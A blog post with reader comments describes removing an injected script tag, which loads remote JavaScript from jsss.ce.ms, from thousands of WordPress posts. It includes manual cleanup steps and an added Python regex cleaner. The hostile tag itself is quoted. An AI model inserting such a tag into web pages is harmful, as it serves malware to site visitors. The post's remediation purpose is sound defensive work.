How to clean a “jsss.ce.ms” SQL injection

Well, that was exciting. Apparently my website had been attacked by some kind of SQL injection. I was curious whether my self-hosted WordPress website had been attacked like 4,300 others. After some digging around, I found that this was not the case. A scan by UnmaskParasites.com revealed nothing unusual. However, a scan by Sucuri’s SiteCheck revealed some JavaScript malware entries in some posts.

I say “some” posts. By this I mean 3300 posts and post revisions, dating back to the very first blog entry on this website and running up to as recently as July 13, 2011. Not including this post, I’ve got 721 published blog entries – with almost all of them containing this little gem:

<script type="text/javascript" src="http://jsss.ce.ms/16"></script><script type="text/javascript" src="http://jsss.ce.ms/16"></script>

Here’s what I did to clean this infection:

  • Copied my entire “_posts” table to “_posts2”
  • Copied my entire “_posts” table to “_posts3”
  • Downloaded “_posts3” as a CSV
  • Found and replaced all instances of the above script in the CSV with “” (an empty string)
  • Deleted the contents of “_posts3”
  • Uploaded the altered CSV into “_posts3”
  • Renamed “_posts” to “_posts1” and “_posts3” to “_posts”
  • Done!
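The CSV find-and-replace step, as an added Python example that is not the author's code: it parses a wp_posts export, strips every copy of the jsss.ce.ms loader from post_content (including the doubled tag shown above), and reports how many tags came out of which rows so the count can be checked against the scanner's findings before the cleaned table is re-imported. It assumes the export carries the columns ID, post_type and post_content, and it generalises slightly by also matching single-quoted attributes and a numeric path other than /16.

```python
import csv
import io
import re

# The loader quoted in the post; used here only to build a constructed sample.
INJECTED = '<script type="text/javascript" src="http://jsss.ce.ms/16"></script>'
FIELDS = ["ID", "post_type", "post_content"]

# Matches that loader with either quote style and any numeric path. Allowing
# a path other than /16 is an assumption; the post only shows /16.
INJECTED_RE = re.compile(
    r"<script[^>]*\bsrc=[\"']http://jsss\.ce\.ms/\d+[\"'][^>]*>\s*</script>",
    re.IGNORECASE,
)


def to_csv(rows):
    """Serialise rows (dicts keyed by FIELDS) the way a CSV export would."""
    out = io.StringIO()
    writer = csv.DictWriter(out, fieldnames=FIELDS, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return out.getvalue()


# Constructed stand-in for a wp_posts export: a post carrying the tag twice
# (as in the post above), a revision carrying it once, and a clean post.
SAMPLE_CSV = to_csv([
    {"ID": "1", "post_type": "post", "post_content": "<p>Hello.</p>" + INJECTED * 2},
    {"ID": "2", "post_type": "revision", "post_content": "<p>Draft.</p>" + INJECTED.replace('"', "'")},
    {"ID": "3", "post_type": "post", "post_content": "<p>Untouched post.</p>"},
])


def clean_export(csv_text):
    """Strip the injected tag from every post_content field.

    Returns (cleaned_rows, report); report maps affected row IDs to the
    number of tags removed, to compare with a scanner's count before the
    cleaned table is re-imported.
    """
    rows, report = [], {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        content, hits = INJECTED_RE.subn("", row["post_content"])
        if hits:
            report[row["ID"]] = hits
            row["post_content"] = content
        rows.append(row)
    return rows, report


if __name__ == "__main__":
    rows, report = clean_export(SAMPLE_CSV)
    print(f"rows cleaned: {len(report)}, tags removed: {sum(report.values())}")
    print(to_csv(rows))
```

Run it against the real export by replacing SAMPLE_CSV with the file contents; any row the report does not list is one the regex did not recognise and should be inspected by hand.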

It’s definitely possible to write a little WordPress plugin to clean this kind of infection out, but there’s little incentive to do so when the manual fix is relatively easy. If you’ve got this kind of infection in your site and don’t know how to take care of it, drop me a line.

4 Responses to “How to clean a “jsss.ce.ms” SQL injection”

  1. MTO says:

    Was your high resource usage related to this?

  2. MakerBlock says:

    @MTO: I honestly don’t know. I figure it couldn’t have been good, though. After fiddling with it, I discovered that it had infected my wife’s blog too! But, thankfully, I was able to clean it out relatively quickly this time.

  3. cyrozap says:

    I just scanned my website and it appears as though I was unaffected. Lately, though, I have seen a lot of attempted blog hijacking attempts. The majority of these attempts come from China and other Asian countries. To combat this, I added a ton of those IP ranges to my apache2.conf file. Go to this site for the blocklists: http://www.wizcrafts.net/chinese-blocklist.html

    Append all that to the end of your apache2.conf, httpd.conf, or .htaccess file and you’ll have a lot fewer hacking attempts.

  4. MakerBlock says:

    @Cyrozap: Awesome! Thanks man!